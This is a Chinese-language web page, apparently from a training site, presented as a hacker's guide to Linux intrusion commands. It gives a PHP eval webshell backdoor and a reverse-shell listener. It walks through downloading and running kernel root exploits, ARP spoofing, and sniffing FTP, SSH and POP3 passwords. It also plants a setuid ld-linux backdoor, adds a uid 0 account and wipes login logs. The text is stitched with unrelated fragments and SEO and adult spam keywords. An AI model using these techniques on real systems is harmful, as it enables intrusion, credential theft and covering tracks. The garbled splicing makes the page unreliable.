中文字幕亚洲第一精品|精品国产免费一区二区|久久婷婷五月六月综合版|中文字幕熟妇久久久人妻|久久综合精品国产一区无码|国产成人精品永久免费视频|午夜亚洲国产精品理论片a级|久久精品一区二区三区无码护土

 訪問(wèn)手機(jī)版  

Linux常用命令|Linux培訓(xùn)學(xué)習(xí)|考試認(rèn)證|工資待遇與招聘,認(rèn)準(zhǔn)超級(jí)網(wǎng)工!

招聘|合作 登陸|注冊(cè)

網(wǎng)絡(luò)工程師培訓(xùn)

當(dāng)前位置:網(wǎng)絡(luò)工程師 > 技術(shù)課程 > linux > 熱點(diǎn)關(guān)注 > linux常用命令

黑客常用 Linux 入侵常用命令

時(shí)間:2019-07-27

linux常用命令_linux命令中的head命令_常用dos命令大全

寫個(gè)php一句話后門上去:

php substr(md5($_request['heroes']),28)=='acd0'&&eval($_request['c'])。/www/wdlinux/php/bin/php -r 'echo md5("wdlinux.cn")。php substr(md5($_request['x']),28)=='6862'&&eval($_request['ki11'])。

kill -sigint `cat /usr/local/php/var/run/php-fpm.pid`。kill -sigusr2 `cat /usr/local/php/var/run/php-fpm.pid`。修改php.ini文件cat >> /usr/local/webserver/php/etc/php.ini << "eof" 。

1、linux的想著先跨站

shell瀏覽目標(biāo)站不行,命令行下輸入:

ls -la /www.users/

2、溢出提權(quán)

# python –c ‘import pty;pty.spawn(“/bin/sh”);

來(lái)得到交互的Shell,一般的系統(tǒng)都默認(rèn)安裝python

輸入id

bash-3.2$ id

uid=529(zeicom) gid=525(zeicom) groups=525(zeicom)

bash-3.2$

這里uid=529(zeicom)還不是root權(quán)限,

輸入uname –r

返回:2.6.18-164.11.1.el5PAE

Linux提權(quán)大致可分為,第三方軟件漏洞、本地信任特性、內(nèi)核溢出

找對(duì)應(yīng)的exp, 這里地址整理很齊全可以這里下

命令輸入pwd,這個(gè)命令是顯示當(dāng)前目錄,

先看能不能編譯 gcc -help

當(dāng)前目錄就是shell的目錄,我在shell上傳2.c

反彈shell 到外網(wǎng)自己機(jī)器的12345端口

上外網(wǎng)服務(wù)器 本地監(jiān)聽 nc -lvvp 12345

一般都能得到一個(gè)apache交互的shell 有時(shí)候又不行

這時(shí)候

# python -c 'import pty;pty.spawn("/bin/sh");'

cd /tmp 進(jìn)入tmp目錄

mkdir Papers 創(chuàng)建一個(gè)Papers的目錄 Papers不顯眼

cd Papers 進(jìn)入 Papers目錄

pwd 查看當(dāng)前目錄

然后命令輸入

linux常用命令_linux命令中的head命令_常用dos命令大全

wget 下載exp

gcc –o 2 2.c //把2.c編譯成可執(zhí)行文件 g++ keio.cc -o keio

chmod +x 2 //給2有執(zhí)行權(quán)限

./2 //執(zhí)行2, 溢出

gcc -I/usr/local/include -L/usr/local/lib -o arpsniffer arpsniffer.c -lpcap -lnet

確定arpsniffer.c需要先裝pcap和 libnet。

rpm -ivh libnet-1.1.2.1-2.1.fc2.rf.i386.rpm

wget ?modtime=1072656000&big_mirror=0

tar zxvf libpcap-0.8.1.tar.gz

cd libpcap-0.8.1

./configure

make

make install

重新編譯arpsniffer.c

gcc -I/usr/local/include -L/usr/local/lib -o arpsniffer arpsniffer.c -lpcap -lnet

這次沒報(bào)錯(cuò),編譯成功。

./arpsniffer -I eth0 -M 192.168.0.6 -W 192.168.0.4 -S 192.168.0.254

下面開始欺騙,由于是服務(wù)器端,因此我們欺騙網(wǎng)關(guān):(網(wǎng)絡(luò)環(huán)境如下linux常用命令,郵件服務(wù)器ip:192.168.0.11 網(wǎng)關(guān):192.168.0.1 本機(jī):192.168.0.77)

./arpsniffer -I eth0 -M 192.168.0.77 -W 192.168.0.1 -S 192.168.0.11 -P 110

在另一個(gè)登錄里面用tcpdump監(jiān)聽下

tcpdump -i eth0 host 192.168.0.11

發(fā)現(xiàn)有數(shù)據(jù),把監(jiān)聽的數(shù)據(jù)存在文件里面:

tcpdump -i eth0 host 172.16.0.12 -w pop.txt

10分鐘后停止,在SecureCRT下用sz命令下載pop.txt到本地,然后用Ethereal分析。

下面我們就可以用linsniffer監(jiān)聽我們想要的用戶名和密碼了。

先修改linsniffer.c:根據(jù)自己的需求監(jiān)聽相應(yīng)的應(yīng)用密碼。我的如下:

if(ntohs(tcp->dest)==21) p=1; /* ftp */

if(ntohs(tcp->dest)==22) p=1; /* ssh for comparison added for example only comment out if desired*/

if(ntohs(tcp->dest)==23) p=1; /* telnet */

if(ntohs(tcp->dest)==80) p=1; /* http */

if(ntohs(tcp->dest)==110) p=1; /* pop3 */

常用dos命令大全_linux常用命令_linux命令中的head命令

if(ntohs(tcp->dest)==513) p=1; /* rlogin */

if(ntohs(tcp->dest)==106) p=1; /* poppasswd */

[root@bbs111 root]# gcc -o linsniffer linsniffer.c

In file included from /usr/include/linux/tcp.h:21,

from linsniffer.c:32:

/usr/include/asm/byteorder.h:6:2: warning: #warning using private kernel header; include <endian.h> instead!

不用管警告,直接運(yùn)行編譯后的linsniffer即可。

[root@bbs111 root]# ./linsniffer

用戶名和密碼都自動(dòng)存到了tcp.log下。

3、利用跨站代碼

linux不提權(quán)跨目錄訪問(wèn)的代碼

linux權(quán)限多設(shè)的比較松的其實(shí),但有的虛擬機(jī)還是不能跨目錄訪問(wèn)的。

在提不了權(quán)的情況下,試試如下代碼吧。運(yùn)氣好的話說(shuō)不定就跨過(guò)去了。

代碼如下:

$path = stripslashes($_GET['path']);

$ok = chmod ($path , 0777);

if ($ok == true)

unable to chmod /system/bin/su: no such file or directory。注意:beat needs to store the last run times of the tasks in a local database file (namedcelerybeat-scheduleby default), so it needs access to write in the current directory, or alternatively you can specify a custom location for this file:。what happens to an incoming message that matches a selector. actions can write the message to a log file, echo the message to a console or other device, write the message to a logged in user, or send the message along to another syslog server.。

?>

把上面代碼保存為tmdsb.PHP

然后訪問(wèn)?path=../../要跨的目錄/index.php

這里的index.PHP是要修改權(quán)限的文件。

收集的另一個(gè)exp:

把下面的代碼保存為exp.PHP

代碼:

@$filename = stripslashes($_POST['filename']);

@$mess = stripslashes($_POST['mess']);

$fp = @fopen({$_POST['filename']}, 'a');

@fputs($fp,$mess

);

@fclose($fp);

常用dos命令大全_linux常用命令_linux命令中的head命令

?>

4.2.618最終Linux Kernel < 2.6.19 udp_sendmsg Local Root Exploit (x86/x64)這個(gè)0day溢出成功

udev提權(quán)

換了個(gè)udev提權(quán),適用于內(nèi)核范圍為2.6.*。

還是上傳文件至服務(wù)器shell所在目錄,執(zhí)行命令ls,發(fā)現(xiàn)文件已經(jīng)躺在那里面了,之后賦予exp執(zhí)行權(quán)限。

chmod +x pwnkernel.c

chmod +x wunderbar_emporium.sh

chmod +x exploit.c

之后執(zhí)行溢出./w*

成功溢出,root權(quán)限。

gina是加載到winlogin進(jìn)程中的linux常用命令,winlogin是系統(tǒng)的用戶交互登陸進(jìn)程是system權(quán)限的,因此我們的后門也有system權(quán)限。你這種方式通過(guò)這個(gè)ftp用戶上傳的文件的owner、group、other權(quán)限可能是屬于這個(gè)ftp用戶的(跑業(yè)務(wù)的程序宿主用戶可能并不是這個(gè)ftp用戶--例如跑nginx和php-fpm的用戶),留意下這個(gè)ftp用戶的各種權(quán)限設(shè)置,比如這個(gè)ftp用戶的上傳的文件的權(quán)限(rwx之類的)。一、用戶如何獲得root權(quán)限:1. 進(jìn)入terminal2. 輸入sudo passwd root 并設(shè)置密碼,提示要你輸入兩次密碼,自己設(shè)定密碼,一定要記住,然后切換到root使用3. 輸入 su root, 要求你輸入密碼,然后輸入剛才設(shè)定的密碼回車就進(jìn)去了4. 如果不想切換root但是想擁有大部分root權(quán)限,可以在使用命令時(shí)候加上sudo,sudo mount掛載sudo 命令......another如果你想在linux上切換用戶,那么輸入 su + 用戶名就ok了,他會(huì)要求你輸入密碼二、用戶如何獲得永久root權(quán)限1. 添加用戶,首先用adduser命令添加一個(gè)普通用戶,命令如下: #adduser tommy //添加一個(gè)名為tommy的用戶#passwd tommy //修改密碼changing password for user tommy.new unix password: //在這里輸入新密碼retype new unix password: //再次輸入新密碼passwd: all authentication tokens updated successfully.2. 賦予root權(quán)限方法一:修改/etc/sudoers 文件,找到下面一行,把前面的注釋(#)去掉## allows people in group wheel to run all commands%wheel all=(all) all然后修改用戶,使其屬于root組(wheel),命令如下:#usermod -g root tommy修改完畢,現(xiàn)在可以用tommy帳號(hào)登錄,然后用命令 su - ,即可獲得root權(quán)限進(jìn)行操作。

依次輸入命令

cd /tmp

sh-3.1# ls /lib/ld-linux*

/lib/ld-linux.so.2

sh-3.1# cp /lib/ld-linux.so.2 /tmp/.str1ven

sh-3.1# ls -l .str1ven

-rwxr-xr-x 1 root root 121684 07-08 21:13 .str1ven

sh-3.1# chmod +s .str1ven

sh-3.1# ls -l .str1ven

-rwsr-sr-x 1 root root 121684 07-08 21:13 .str1ven

成功建立一個(gè)后門,退出root,執(zhí)行./.str1ven `which whoami`,又成功獲取root權(quán)限~~

cat /etc/passwd 查看linux用戶

cat /etc/shadow 查看用戶密碼需要root權(quán)限

cat /etc/sysconfig/network-scripts/ifcfg-ethn N代表網(wǎng)卡號(hào) 查看所在網(wǎng)卡的ip信息

ifconfig 查看本機(jī)ip信息

cat /etc/resolv.conf 查看DNS信息

bash -i 在反彈的shell中使用可以直觀顯示命令

bash prompt: 當(dāng)你以普通限權(quán)用戶身份進(jìn)入的時(shí)候,一般你會(huì)有一個(gè)類似bash$的prompt。當(dāng)你以

Root登陸時(shí),你的prompt會(huì)變成bash#。

系統(tǒng)變量 : 試著echo "$USER / $EUID" 系統(tǒng)應(yīng)該會(huì)告訴你它認(rèn)為你是什么用戶。

linux常用命令_linux命令中的head命令_常用dos命令大全

echo 1>/proc/sys/net/ipv4/if_forward是不是你寫錯(cuò)了,應(yīng)該是echo 1>/proc/sys/net/ipv4/ip_forward,

vim /proc/sys/net/ipv4/ip_forward 吧,默認(rèn)是0,也就是內(nèi)核不進(jìn)行數(shù)據(jù)包過(guò)濾,改為1 ,讓內(nèi)核對(duì)數(shù)據(jù)包進(jìn)行filter處理!

netstat -an |grep LISTEN |grep :80 查看端口

service --status-all | grep running

service --status-all | grep http

查看運(yùn)行服務(wù)

lsb_release -a 查看系統(tǒng)版本

重啟ssh服務(wù) :

/usr/sbin/sshd stop/

usr/sbin/sshd start

ssd_config文件里

PasswordAuthentication no,

將其改為

PasswordAuthentication yes

遠(yuǎn)程ssh才可登錄

否則顯示Access denied

其中Usepam yes可能用來(lái)建立pam方式login,比如從其它linux主機(jī)ssh到服務(wù)端,如果關(guān)閉,則不能打開.

su的菜鳥用法

先chomod 777 /etc/passwd

然后修改bin用戶的gid和uid為0

然后passwd設(shè)置bin的密碼

然后cp /bin/bash /sbin/nologin

然后su的時(shí)候su - bin就可以到rootshell了。

這個(gè)原理就是當(dāng)ssh不允許root用ssh終端登陸的時(shí)候,我們又不知道root密碼的一種很菜鳥的做法。

還可以這樣

sed -i s/bin:x:1:1/bin:x:0:1/g /etc/passwd

gcc prtcl2.c –o local –static –Wall

echo "nosec:x:0:0::/:/bin/sh" >> /etc/passwd

linux賬戶系統(tǒng)文件主要有/etc/passwd,/etc/shadow,/etc/group,/etc/gshadow.。lsattr /etc/passwd /etc/shadow /etc/group /etc/gshadow /etc/services #顯示文件的屬性。echo -e "*thardtnofilet65535" >> /etc/security/limits.conf

echo -e "*tsofttnofilet65535" >> /etc/security/limits.d/90-nproc.conf。

清空l(shuí)ast記錄 cp /dev/null /var/log/wtmp

-----

dd if=/dev/zero of=yourfile bs=10M count=10 建立一個(gè)100m的大文件在利用Linux Kernel <= 2.6.17.4 (proc) Local Root Exploit提權(quán)的時(shí)候要用到的

/etc/init.d/ssh start 開22端口

/etc/ssh/sshd_config SSH服務(wù)配置文件